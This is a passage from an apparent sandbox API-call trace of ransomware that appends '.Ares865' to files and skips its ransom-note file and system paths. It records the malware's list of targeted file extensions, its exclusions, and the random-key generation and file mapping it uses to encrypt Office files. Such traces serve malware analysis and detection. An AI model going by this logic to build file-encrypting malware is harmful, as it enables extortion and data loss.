(lpString1="dll", lpString2="sdf") returned -1 [0086.889] lstrlenW (lpString="sis") returned 3 [0086.889] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0086.889] lstrlenW (lpString="spq") returned 3 [0086.889] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0086.889] lstrlenW (lpString="te") returned 2 [0086.889] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0086.889] lstrlenW (lpString="teacher") returned 7 [0086.890] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0086.890] lstrlenW (lpString="tmd") returned 3 [0086.890] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0086.890] lstrlenW (lpString="tps") returned 3 [0086.890] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0086.890] lstrlenW (lpString="trc") returned 3 [0086.890] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.890] lstrlenW (lpString="trc") returned 3 [0086.890] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.890] lstrlenW (lpString="trm") returned 3 [0086.890] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0086.890] lstrlenW (lpString="udb") returned 3 [0086.890] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0086.890] lstrlenW (lpString="udl") returned 3 [0086.890] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0086.890] lstrlenW (lpString="usr") returned 3 [0086.890] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0086.890] lstrlenW (lpString="v12") returned 3 [0086.890] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0086.890] lstrlenW (lpString="vis") returned 3 [0086.890] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0086.890] lstrlenW (lpString="vpd") returned 3 [0086.890] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0086.890] lstrlenW (lpString="vvv") returned 3 [0086.890] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0086.890] lstrlenW (lpString="wdb") returned 3 [0086.890] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0086.890] lstrlenW (lpString="wmdb") returned 4 [0086.890] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0086.890] lstrlenW (lpString="wrk") returned 3 [0086.890] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0086.890] lstrlenW (lpString="xdb") returned 3 [0086.890] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0086.890] lstrlenW (lpString="xld") returned 3 [0086.890] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0086.890] lstrlenW (lpString="xmlff") returned 5 [0086.891] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0086.891] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll.Ares865") returned 79 [0086.891] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0086.891] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0086.892] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=473440) returned 1 [0086.892] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0086.892] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0086.892] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0086.892] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0086.893] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0086.893] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.893] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x73c60, lpName=0x0) returned 0x15c [0086.894] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x73c60) returned 0x420000 [0086.917] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0086.918] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0086.918] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.918] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0086.918] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0086.918] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0086.918] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0086.918] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0086.918] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0086.918] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0086.919] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0086.919] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0086.919] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0086.919] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0086.923] CloseHandle (hObject=0x15c) returned 1 [0086.923] CloseHandle (hObject=0x118) returned 1 [0086.923] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0086.923] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0086.923] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0086.925] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa1789a00, ftCreationTime.dwHighDateTime=0x1cacd25, ftLastAccessTime.dwLowDateTime=0xef0ca650, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa1789a00, ftLastWriteTime.dwHighDateTime=0x1cacd25, nFileSizeHigh=0x0, nFileSizeLow=0x24360, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WWINTL.DLL.trx_dll", cAlternateFileName="WWINTL~1.TRX")) returned 1 [0086.925] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0086.925] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0086.925] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2=".") returned 1 [0086.925] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="..") returned 1 [0086.925] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="windows") returned 1 [0086.926] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="bootmgr") returned 1 [0086.926] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="temp") returned 1 [0086.926] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="pagefile.sys") returned 1 [0086.926] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="boot") returned 1 [0086.926] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="ids.txt") returned 1 [0086.926] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0086.926] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="perflogs") returned 1 [0086.926] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="MSBuild") returned 1 [0086.926] lstrlenW (lpString="WWINTL.DLL.trx_dll") returned 18 [0086.926] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll") returned 71 [0086.926] lstrcpyW (in: lpString1=0x2cce468, lpString2="WWINTL.DLL.trx_dll" | out: lpString1="WWINTL.DLL.trx_dll") returned="WWINTL.DLL.trx_dll" [0086.926] lstrlenW (lpString="WWINTL.DLL.trx_dll") returned 18 [0086.926] lstrlenW (lpString="Ares865") returned 7 [0086.926] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0086.926] lstrlenW (lpString=".dll") returned 4 [0086.926] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2=".dll") returned 1 [0086.926] lstrlenW (lpString=".lnk") returned 4 [0086.926] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2=".lnk") returned 1 [0086.926] lstrlenW (lpString=".ini") returned 4 [0086.926] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2=".ini") returned 1 [0086.926] lstrlenW (lpString=".sys") returned 4 [0086.926] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2=".sys") returned 1 [0086.926] lstrlenW (lpString="WWINTL.DLL.trx_dll") returned 18 [0086.926] lstrlenW (lpString="bak") returned 3 [0086.926] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0086.926] lstrlenW (lpString="ba_") returned 3 [0086.926] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0086.926] lstrlenW (lpString="dbb") returned 3 [0086.926] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0086.926] lstrlenW (lpString="vmdk") returned 4 [0086.926] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0086.926] lstrlenW (lpString="rar") returned 3 [0086.926] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0086.926] lstrlenW (lpString="zip") returned 3 [0086.926] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0086.927] lstrlenW (lpString="tgz") returned 3 [0086.927] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0086.927] lstrlenW (lpString="vbox") returned 4 [0086.927] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0086.927] lstrlenW (lpString="vdi") returned 3 [0086.927] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0086.927] lstrlenW (lpString="vhd") returned 3 [0086.927] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0086.927] lstrlenW (lpString="vhdx") returned 4 [0086.927] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0086.927] lstrlenW (lpString="avhd") returned 4 [0086.927] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0086.927] lstrlenW (lpString="db") returned 2 [0086.927] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0086.927] lstrlenW (lpString="db2") returned 3 [0086.927] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0086.927] lstrlenW (lpString="db3") returned 3 [0086.927] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0086.927] lstrlenW (lpString="dbf") returned 3 [0086.927] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0086.927] lstrlenW (lpString="mdf") returned 3 [0086.927] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0086.927] lstrlenW (lpString="mdb") returned 3 [0086.927] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0086.927] lstrlenW (lpString="sql") returned 3 [0086.927] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0086.927] lstrlenW (lpString="sqlite") returned 6 [0086.927] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0086.927] lstrlenW (lpString="sqlite3") returned 7 [0086.927] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0086.927] lstrlenW (lpString="sqlitedb") returned 8 [0086.927] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0086.927] lstrlenW (lpString="xml") returned 3 [0086.927] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0086.927] lstrlenW (lpString="$er") returned 3 [0086.927] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0086.927] lstrlenW (lpString="4dd") returned 3 [0086.928] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0086.928] lstrlenW (lpString="4dl") returned 3 [0086.928] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0086.928] lstrlenW (lpString="^^^") returned 3 [0086.928] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0086.928] lstrlenW (lpString="abs") returned 3 [0086.928] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0086.928] lstrlenW (lpString="abx") returned 3 [0086.928] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0086.928] lstrlenW (lpString="accdb") returned 5 [0086.928] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0086.928] lstrlenW (lpString="accdc") returned 5 [0086.928] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0086.928] lstrlenW (lpString="accde") returned 5 [0086.928] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0086.928] lstrlenW (lpString="accdr") returned 5 [0086.928] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0086.928] lstrlenW (lpString="accdt") returned 5 [0086.928] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0086.928] lstrlenW (lpString="accdw") returned 5 [0086.928] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0086.928] lstrlenW (lpString="accft") returned 5 [0086.928] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0086.928] lstrlenW (lpString="adb") returned 3 [0086.928] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.928] lstrlenW (lpString="adb") returned 3 [0086.928] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.928] lstrlenW (lpString="ade") returned 3 [0086.928] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0086.928] lstrlenW (lpString="adf") returned 3 [0086.928] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0086.928] lstrlenW (lpString="adn") returned 3 [0086.928] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0086.928] lstrlenW (lpString="adp") returned 3 [0086.928] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0086.928] lstrlenW (lpString="alf") returned 3 [0086.929] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0086.929] lstrlenW (lpString="ask") returned 3 [0086.929] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0086.929] lstrlenW (lpString="btr") returned 3 [0086.929] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0086.929] lstrlenW (lpString="cat") returned 3 [0086.929] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0086.929] lstrlenW (lpString="cdb") returned 3 [0086.929] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0086.929] lstrlenW (lpString="ckp") returned 3 [0086.929] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0086.929] lstrlenW (lpString="cma") returned 3 [0086.929] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0086.929] lstrlenW (lpString="cpd") returned 3 [0086.929] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0086.929] lstrlenW (lpString="dacpac") returned 6 [0086.929] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0086.929] lstrlenW (lpString="dad") returned 3 [0086.929] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0086.929] lstrlenW (lpString="dadiagrams") returned 10 [0086.929] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0086.929] lstrlenW (lpString="daschema") returned 8 [0086.929] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0086.929] lstrlenW (lpString="db-journal") returned 10 [0086.929] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0086.929] lstrlenW (lpString="db-shm") returned 6 [0086.929] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0086.929] lstrlenW (lpString="db-wal") returned 6 [0086.929] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0086.929] lstrlenW (lpString="dbc") returned 3 [0086.929] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0086.929] lstrlenW (lpString="dbs") returned 3 [0086.929] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0086.929] lstrlenW (lpString="dbt") returned 3 [0086.929] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0086.929] lstrlenW (lpString="dbv") returned 3 [0086.929] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0086.930] lstrlenW (lpString="dbx") returned 3 [0086.930] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0086.930] lstrlenW (lpString="dcb") returned 3 [0086.930] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0086.930] lstrlenW (lpString="dct") returned 3 [0086.930] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0086.930] lstrlenW (lpString="dcx") returned 3 [0086.930] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0086.930] lstrlenW (lpString="ddl") returned 3 [0086.930] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0086.930] lstrlenW (lpString="dlis") returned 4 [0086.930] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0086.930] lstrlenW (lpString="dp1") returned 3 [0086.930] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0086.930] lstrlenW (lpString="dqy") returned 3 [0086.930] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0086.930] lstrlenW (lpString="dsk") returned 3 [0086.930] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0086.930] lstrlenW (lpString="dsn") returned 3 [0086.930] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0086.930] lstrlenW (lpString="dtsx") returned 4 [0086.930] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0086.930] lstrlenW (lpString="dxl") returned 3 [0086.930] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0086.930] lstrlenW (lpString="eco") returned 3 [0086.930] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0086.930] lstrlenW (lpString="ecx") returned 3 [0086.930] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0086.930] lstrlenW (lpString="edb") returned 3 [0086.930] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0086.930] lstrlenW (lpString="epim") returned 4 [0086.930] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0086.930] lstrlenW (lpString="fcd") returned 3 [0086.930] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0086.930] lstrlenW (lpString="fdb") returned 3 [0086.931] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0086.931] lstrlenW (lpString="fic") returned 3 [0086.931] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0086.931] lstrlenW (lpString="flexolibrary") returned 12 [0086.931] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0086.931] lstrlenW (lpString="fm5") returned 3 [0086.931] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0086.931] lstrlenW (lpString="fmp") returned 3 [0086.931] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0086.931] lstrlenW (lpString="fmp12") returned 5 [0086.931] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0086.931] lstrlenW (lpString="fmpsl") returned 5 [0086.931] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0086.931] lstrlenW (lpString="fol") returned 3 [0086.931] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0086.931] lstrlenW (lpString="fp3") returned 3 [0086.931] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0086.931] lstrlenW (lpString="fp4") returned 3 [0086.931] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0086.931] lstrlenW (lpString="fp5") returned 3 [0086.931] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0086.931] lstrlenW (lpString="fp7") returned 3 [0086.931] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0086.931] lstrlenW (lpString="fpt") returned 3 [0086.931] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0086.931] lstrlenW (lpString="frm") returned 3 [0086.931] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0086.931] lstrlenW (lpString="gdb") returned 3 [0086.931] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.931] lstrlenW (lpString="gdb") returned 3 [0086.931] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.931] lstrlenW (lpString="grdb") returned 4 [0086.931] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0086.931] lstrlenW (lpString="gwi") returned 3 [0086.931] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0086.931] lstrlenW (lpString="hdb") returned 3 [0086.931] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0086.932] lstrlenW (lpString="his") returned 3 [0086.932] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0086.932] lstrlenW (lpString="ib") returned 2 [0086.932] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0086.932] lstrlenW (lpString="idb") returned 3 [0086.932] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0086.932] lstrlenW (lpString="ihx") returned 3 [0086.932] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0086.932] lstrlenW (lpString="itdb") returned 4 [0086.932] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0086.932] lstrlenW (lpString="itw") returned 3 [0086.932] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0086.932] lstrlenW (lpString="jet") returned 3 [0086.932] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0086.932] lstrlenW (lpString="jtx") returned 3 [0086.932] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0086.932] lstrlenW (lpString="kdb") returned 3 [0086.932] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0086.932] lstrlenW (lpString="kexi") returned 4 [0086.932] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0086.932] lstrlenW (lpString="kexic") returned 5 [0086.932] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0086.932] lstrlenW (lpString="kexis") returned 5 [0086.932] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0086.932] lstrlenW (lpString="lgc") returned 3 [0086.932] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0086.932] lstrlenW (lpString="lwx") returned 3 [0086.932] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0086.932] lstrlenW (lpString="maf") returned 3 [0086.932] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0086.932] lstrlenW (lpString="maq") returned 3 [0086.932] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0086.932] lstrlenW (lpString="mar") returned 3 [0086.932] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0086.932] lstrlenW (lpString="marshal") returned 7 [0086.932] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0086.933] lstrlenW (lpString="mas") returned 3 [0086.933] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0086.933] lstrlenW (lpString="mav") returned 3 [0086.933] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0086.933] lstrlenW (lpString="maw") returned 3 [0086.934] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0086.935] lstrlenW (lpString="mdbhtml") returned 7 [0086.935] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0086.935] lstrlenW (lpString="mdn") returned 3 [0086.935] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0086.935] lstrlenW (lpString="mdt") returned 3 [0086.935] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0086.935] lstrlenW (lpString="mfd") returned 3 [0086.935] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0086.935] lstrlenW (lpString="mpd") returned 3 [0086.935] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0086.935] lstrlenW (lpString="mrg") returned 3 [0086.935] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0086.935] lstrlenW (lpString="mud") returned 3 [0086.935] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0086.935] lstrlenW (lpString="mwb") returned 3 [0086.935] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0086.935] lstrlenW (lpString="myd") returned 3 [0086.935] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0086.935] lstrlenW (lpString="ndf") returned 3 [0086.935] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0086.935] lstrlenW (lpString="nnt") returned 3 [0086.935] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0086.935] lstrlenW (lpString="nrmlib") returned 6 [0086.935] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0086.935] lstrlenW (lpString="ns2") returned 3 [0086.935] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0086.935] lstrlenW (lpString="ns3") returned 3 [0086.935] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0086.935] lstrlenW (lpString="ns4") returned 3 [0086.935] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0086.935] lstrlenW (lpString="nsf") returned 3 [0086.935] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0086.935] lstrlenW (lpString="nv") returned 2 [0086.935] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0086.935] lstrlenW (lpString="nv2") returned 3 [0086.935] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0086.935] lstrlenW (lpString="nwdb") returned 4 [0086.936] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0086.936] lstrlenW (lpString="nyf") returned 3 [0086.936] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0086.936] lstrlenW (lpString="odb") returned 3 [0086.936] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.936] lstrlenW (lpString="odb") returned 3 [0086.936] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.936] lstrlenW (lpString="oqy") returned 3 [0086.936] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0086.936] lstrlenW (lpString="ora") returned 3 [0086.936] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0086.936] lstrlenW (lpString="orx") returned 3 [0086.936] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0086.936] lstrlenW (lpString="owc") returned 3 [0086.936] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0086.936] lstrlenW (lpString="p96") returned 3 [0086.936] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0086.936] lstrlenW (lpString="p97") returned 3 [0086.936] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0086.936] lstrlenW (lpString="pan") returned 3 [0086.936] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0086.936] lstrlenW (lpString="pdb") returned 3 [0086.936] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0086.936] lstrlenW (lpString="pdm") returned 3 [0086.936] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0086.936] lstrlenW (lpString="pnz") returned 3 [0086.936] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0086.936] lstrlenW (lpString="qry") returned 3 [0086.936] lstrcmpiW (lpString1="dll", 